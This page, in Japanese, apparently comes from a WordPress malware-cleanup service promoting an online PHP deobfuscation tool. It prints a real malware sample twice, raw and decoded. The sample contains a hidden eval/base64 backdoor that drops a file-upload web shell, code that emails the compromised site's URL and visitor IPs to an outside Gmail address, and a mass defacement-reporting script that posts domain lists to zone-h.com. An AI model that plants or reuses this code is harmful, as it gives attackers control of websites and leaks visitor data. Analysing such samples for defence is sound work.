Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");exit;}?> <?php $defacer='3xp1r3 Pr1nc3'; $display_details=0; $method=14; $reason=5; if(!isset($_SESSION['trimite'])){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'<br />User IP: '.$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':''); @mail("13shell37@gmail.com","Zone-h Grabber",$url); $_SESSION['trimite']=true; } error_reporting(0); set_time_limit(0); if(!function_exists('curl_init')){echo "cURL not installed/disabled.\n";exit;} $cli=(isset($argv[0]))?1:0; if($cli==1){ $file=$argv[1]; $sites=file($file); if(!file_exists($file)){echo "$file not found.\n";exit;} }else{ if(function_exists(apache_setenv)){ @apache_setenv('no-gzip', 1);} @ini_set('zlib.output_compression', 0); @ini_set('implicit_flush', 1); @ob_implicit_flush(true); @ob_end_flush(); if(isset($_POST['domains'])){ $sites=explode("\n",$_POST['domains']); } if (file_exists($_FILES["file"]["tmp_name"])){ $file=$_FILES["file"]["tmp_name"];$sites=file($file);} echo <<<EOF <html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Fastest Zone-H Mass Deface Poster</title> <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000"> <div align="center"> <table width="67%" style="border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0"> <tr><td align=center> <font face="Courier New" size=4 color=yellow>Fastest Zone-H Mass Deface Poster</font> </td></tr> </table> <br /><pre> EOF; if(!isset($_POST['defacer'])){ echo <<<EOF <form enctype="multipart/form-data" method="POST"> <div align='center'> <span lang='en-us'><font color='#FF0000'><b>Your Nick:</b></font></span><br/><input name="defacer" type="text" value="$defacer" /><br/> <table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'> <tr> <td align='center'> <span lang='en-us'><font color='#FF0000'><b>Domains:</b></font></span> <p align='center'> <textarea rows='30' name='domains' cols='50' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'></textarea><br/> <span lang='en-us'><font color='#FF0000'><b>OR</b></font></span><br/>Submit form .txt file:<br/><input name="file" type="file" /><br /> <br/><br/><input type='submit' value=' Subtmit ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></p></td> </tr> </table></form> EOF; } $defacer=$_POST['defacer'];} if(!$sites){echo '</pre></body></html>';exit;} $sites=array_unique(str_replace('http://','',$sites)); $total=count($sites); echo "[+] Total unique domain: $total\n\n"; $pause=10; $start=time(); $main=curl_multi_init(); for($m=0;$m<3;$m++){ $http[] = curl_init(); } for($n=0;$n<$total;$n +=30){ if($display_details==1){ for($x=0;$x<30;$x++){ echo'[+] Adding '.rtrim($sites[$n+$x]).''; echo "\n"; } } $d=$n+30; if($d>$total){$d=$total;} echo "=====================>[$d/$total]\n"; for($w=0;$w<3;$w++){ $p=$w * 10; if(!(isset($sites[$n+$p]))){$pause=$w;break;} $posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send"; $curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]); curl_setopt_array($http[$w],$curlopt); curl_multi_add_handle($main,$http[$w]); } $running = null; do{ curl_multi_exec($main,$running); }while($running > 0); for($m=0;$m<3;$m++){ if($pause==$m){break;} curl_multi_remove_handle($main, $http[$m]); $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if ($code != 200) { while(true){ echo' [-]Serevr Error!....Retrying';echo "\n"; sleep(5); curl_exec($http[$m]); $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if( $code== 200){break 1;} } } } } $end= time() - $start; echo '+++++++DONE+++++++';echo "\n\n[*]Time took: $end seconds\n";curl_multi_close($main); if($cli==0){echo '</pre></body></html>';} exit; ?> ads via Carbon
?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");exit;}?> <?php $defacer = '3xp1r3 Pr1nc3'; $display_details = 0; $method = 14; $reason = 5; if (!isset($_SESSION['trimite'])) { $url = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '<br />User IP: ' . $_SERVER['REMOTE_ADDR'] . (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? '(' . $_SERVER['HTTP_X_FORWARDED_FOR'] . ')' : ''); @mail("13shell37@gmail.com", "Zone-h Grabber", $url); $_SESSION['trimite'] = true; } error_reporting(0); set_time_limit(0); if (!function_exists('curl_init')) { echo "cURL not installed/disabled.\n"; exit; } $cli = isset($argv[0]) ? 1 : 0; if ($cli == 1) { $file = $argv[1]; $sites = file($file); if (!file_exists($file)) { echo "{$file} not found.\n"; exit; } } else { if (function_exists(apache_setenv)) { @apache_setenv('no-gzip', 1); } @ini_set('zlib.output_compression', 0); @ini_set('implicit_flush', 1); @ob_implicit_flush(true); @ob_end_flush(); if (isset($_POST['domains'])) { $sites = explode("\n", $_POST['domains']); } if (file_exists($_FILES["file"]["tmp_name"])) { $file = $_FILES["file"]["tmp_name"]; $sites = file($file); } echo <<<EOF <html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Fastest Zone-H Mass Deface Poster</title> <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000"> <div align="center"> <table width="67%" style="border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0"> <tr><td align=center> <font face="Courier New" size=4 color=yellow>Fastest Zone-H Mass Deface Poster</font> </td></tr> </table> <br /><pre> EOF; if (!isset($_POST['defacer'])) { echo <<<EOF <form enctype="multipart/form-data" method="POST"> <div align='center'> <span lang='en-us'><font color='#FF0000'><b>Your Nick:</b></font></span><br/><input name="defacer" type="text" value="{$defacer}" /><br/> <table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'> <tr> <td align='center'> <span lang='en-us'><font color='#FF0000'><b>Domains:</b></font></span> <p align='center'> <textarea rows='30' name='domains' cols='50' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'></textarea><br/> <span lang='en-us'><font color='#FF0000'><b>OR</b></font></span><br/>Submit form .txt file:<br/><input name="file" type="file" /><br /> <br/><br/><input type='submit' value=' Subtmit ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></p></td> </tr> </table></form> EOF; } $defacer = $_POST['defacer']; } if (!$sites) { echo '</pre></body></html>'; exit; } $sites = array_unique(str_replace('http://', '', $sites)); $total = count($sites); echo "[+] Total unique domain: {$total}\n\n"; $pause = 10; $start = time(); $main = curl_multi_init(); for ($m = 0; $m < 3; $m++) { $http[] = curl_init(); } for ($n = 0; $n < $total; $n += 30) { if ($display_details == 1) { for ($x = 0; $x < 30; $x++) { echo '[+] Adding ' . rtrim($sites[$n + $x]) . ''; echo "\n"; } } $d = $n + 30; if ($d > $total) { $d = $total; } echo "=====================>[{$d}/{$total}]\n"; for ($w = 0; $w < 3; $w++) { $p = $w * 10; if (!isset($sites[$n + $p])) { $pause = $w; break; } $posts[$w] = "defacer={$defacer}&domain1=http%3A%2F%2F" . rtrim($sites[$n + $p]) . "&domain2=http%3A%2F%2F" . rtrim($sites[$n + $p + 1]) . "&domain3=http%3A%2F%2F" . rtrim($sites[$n + $p + 2]) . "&domain4=http%3A%2F%2F" . rtrim($sites[$n + $p + 3]) . "&domain5=http%3A%2F%2F" . rtrim($sites[$n + $p + 4]) . "&domain6=http%3A%2F%2F" . rtrim($sites[$n + $p + 5]) . "&domain7=http%3A%2F%2F" . rtrim($sites[$n + $p + 6]) . "&domain8=http%3A%2F%2F" . rtrim($sites[$n + $p + 7]) . "&domain9=http%3A%2F%2F" . rtrim($sites[$n + $p + 8]) . "&domain10=http%3A%2F%2F" . rtrim($sites[$n + $p + 9]) . "&hackmode=" . $method . "&reason=" . $reason . "&submit=Send"; $curlopt = array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => true, CURLOPT_HEADER => false, CURLOPT_HTTPHEADER => array("Keep-Alive: 7"), CURLOPT_CONNECTTIMEOUT => 3, CURLOPT_URL => 'http://www.zone-h.com/notify/mass', CURLOPT_POSTFIELDS => $posts[$w]); curl_setopt_array($http[$w], $curlopt); curl_multi_add_handle($main, $http[$w]); } $running = null; do { curl_multi_exec($main, $running); } while ($running > 0); for ($m = 0; $m < 3; $m++) { if ($pause == $m) { break; } curl_multi_remove_handle($main, $http[$m]); $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if ($code != 200) { while (true) { echo ' [-]Serevr Error!....Retrying'; echo "\n"; sleep(5); curl_exec($http[$m]); $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if ($code == 200) { break 1; } } } } } $end = time() - $start; echo '+++++++DONE+++++++'; echo "\n\n[*]Time took: {$end} seconds\n"; curl_multi_close($main); if ($cli == 0) { echo '</pre></body></html>'; } exit;
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.